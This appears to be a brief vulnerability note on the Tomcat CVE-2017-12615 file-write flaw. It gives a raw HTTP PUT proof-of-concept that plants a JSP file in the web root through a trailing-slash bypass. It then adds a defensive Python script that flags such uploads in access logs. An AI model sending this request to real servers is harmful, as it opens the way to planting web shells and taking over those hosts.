CVE-2017-12615: Tomcat arbitrary file write
Affected versions: Tomcat 7.0.0-7.0.81
POC
Craft the request directly; it writes the shell into the web root directory:
PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

shell
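
Detection logic for the request above, added here as an example (not part of the original note): it scans Tomcat access-log lines for PUT requests whose path names a JSP file once the trailing slash is stripped, and marks those the server answered with 201 or 204. It assumes the access log uses the common pattern (%h %l %u %t "%r" %s %b); the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Assumed log layout: Tomcat AccessLogValve "common" pattern, %h %l %u %t "%r" %s %b
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)
JSP_EXTENSIONS = (".jsp", ".jspx")
WRITE_OK = {"201", "204"}  # DefaultServlet: resource created / resource overwritten


def is_jsp_upload(method, target):
    """True for a PUT whose decoded path names a JSP once trailing '/' or spaces are removed."""
    if method != "PUT":
        return False
    path = unquote(urlsplit(target).path).rstrip("/ ").lower()
    return path.endswith(JSP_EXTENSIONS)


def scan(lines):
    """Return one finding per PUT-to-JSP request, marking those the server accepted."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or not is_jsp_upload(m["method"], m["target"]):
            continue
        findings.append({
            "host": m["host"],
            "time": m["time"],
            "target": m["target"],
            "written": m["status"] in WRITE_OK,  # True means a file landed on disk
        })
    return findings


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.jsp HTTP/1.1" 200 1024',
    '192.0.2.44 - - [01/Jan/2024:10:00:05 +0000] "PUT /1.jsp/ HTTP/1.1" 201 -',
    '192.0.2.44 - - [01/Jan/2024:10:00:09 +0000] "PUT /docs/a.txt HTTP/1.1" 403 -',
    '192.0.2.51 - - [01/Jan/2024:10:02:00 +0000] "PUT /x.JSP%2F HTTP/1.1" 404 -',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A finding with "written" set to True means the server stored the file, so the named path in the web root should be checked and removed; findings with "written" set to False are rejected attempts.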